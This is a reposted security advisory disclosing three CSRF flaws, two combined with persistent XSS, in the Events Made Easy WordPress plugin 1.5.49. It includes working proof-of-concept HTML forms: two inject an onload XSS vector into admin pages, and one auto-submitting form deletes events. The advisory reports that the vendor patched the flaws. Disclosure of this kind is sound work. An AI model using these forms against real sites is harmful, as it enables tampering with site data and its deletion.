API tools faq
paste
Advertisement
moften

Events Made Easy WordPress plugin CSRF + Persistent XSS

moften
Oct 18th, 2015
152
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.04 KB | None | 0 0
raw download clone embed print report
  1. Plugin link: https://wordpress.org/plugins/events-made-easy/
  2. Active Installs: 10,000+
  3. Version tested: 1.5.49
  4. CVE Reference: Waiting
  5. Original advisory:
  6. https://www.davidsopas.com/events-made-easy-wordpress-plugin-csrf-persistent-xss/
  7.  
  8. Events Made Easy is a full-featured event management solution for
  9. WordPress. Events Made Easy supports public, private, draft and recurring
  10. events, locations management, RSVP (+ optional approval), Paypal,
  11. 2Checkout, FirstData and Google maps. With Events Made Easy you can plan
  12. and publish your event, or let people reserve spaces for your weekly
  13. meetings. You can add events list, calendars and description to your blog
  14. using multiple sidebar widgets or shortcodes; if you are a web designer you
  15. can simply employ the template tags provided by Events Made Easy.
  16.  
  17. When playing around with this plugin I noticed a couple of vulnerabilities.
  18. In my opinion they are critical because they can could cause damage to a
  19. WordPress installation.
  20. All of them are related to CSRF where the vendor forgot to place a security
  21. token (wp_nonce) on the affected forms.
  22.  
  23. #1 Add template CSRF + Persistent XSS
  24.  
  25. URL: /wp-admin/admin.php?page=eme-templates
  26.  
  27. If a authenticated admin clicks on the “Add template” button on a html with
  28. this code:
  29.  
  30. <form action="https://victims_website/wp-admin/admin.php?page=eme-templates"
  31. method="POST">
  32. <input type="hidden" name="eme_admin_action" value="do_addtemplate" />
  33. <input type="hidden" name="description" value="<svg/onload=confirm(1)>" />
  34. <input type="hidden" name="format" value="csrf" />
  35. <input type="submit" name="submit" value="Add template" />
  36. </form>
  37.  
  38. It will add a Persistent XSS vector on the template description field. This
  39. field is automatically executed when the admin visits the page
  40. admin.php?page=eme-templates.
  41.  
  42. Possible attack scenario:
  43.  
  44. Malicious user checks that Events Made Easy is installed on a WordPress
  45. installation
  46. Malicious sends admin a link to the page that has a auto-submit form
  47. with a XSS vector that hijacks victims browser
  48. Victim visits the page and gets hijacked
  49.  
  50. #2 Add Form Field CSRF + Persistent XSS
  51.  
  52. URL: /wp-admin/admin.php?page=eme-formfields
  53.  
  54. If a authenticated admin clicks on the “Add field” button on a html with
  55. this code:
  56.  
  57. <form action="https://victims_website/wp-admin/admin.php?page=eme-formfields"
  58. method="POST">
  59. <input type="hidden" name="eme_admin_action" value="do_addformfield" />
  60. <input type="hidden" name="field_name" value="<svg/onload=confirm(1)>" />
  61. <input type="hidden" name="field_type" value="1" />
  62. <input type="hidden" name="field_info" value="csrf" />
  63. <input type="hidden" name="field_tags" value="csrf" />
  64. <input type="submit" name="submit" value="Add field" />
  65. </form>
  66.  
  67. Like vulnerability #1 the attack scenario is the same. Same issue affects
  68. form fields on this plugin.
  69.  
  70. #3 Remove events older than CSRF
  71.  
  72. URL: /wp-admin/admin.php?page=eme-cleanup
  73.  
  74. With this CSRF a malicious user could delete all the events older than a
  75. certain number.
  76. In my proof of concept I used a auto-submit form that could also be used in
  77. vulnerabilities #1 and #2.
  78.  
  79. <form action="https://victims_website/wp-admin/admin.php?page=eme-cleanup"
  80. name="dsopas" method="POST">
  81. <input type="hidden" name="page" value="eme-cleanup" />
  82. <input type="hidden" name="eme_admin_action" value="eme_cleanup" />
  83. <input type="hidden" name="eme_number" value="1" />
  84. <input type="hidden" name="eme_period" value="day" />
  85. <input type="hidden" name="doaction" value="Apply" />
  86. </form> <script> document.dsopas.submit(); </script>
  87.  
  88. Possible attack scenario:
  89.  
  90. Malicious user checks that Events Made Easy is installed on a WordPress
  91. installation
  92. Malicious sends admin a link to the page that has this auto-submit form
  93. Without victim noticing, events older than 1 day will be removed.
  94.  
  95. Solution:
  96. Vendor in a matter of few hours launched a patched version – 1.5.50. Also
  97. he was kind enough to put my name on the changelog.
  98.  
  99. *-David Sopas*
  100. *davidsopas.com <https://www.davidsopas.com>*
  101. *@dsopas <https://www.twitter.com/dsopas>*
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!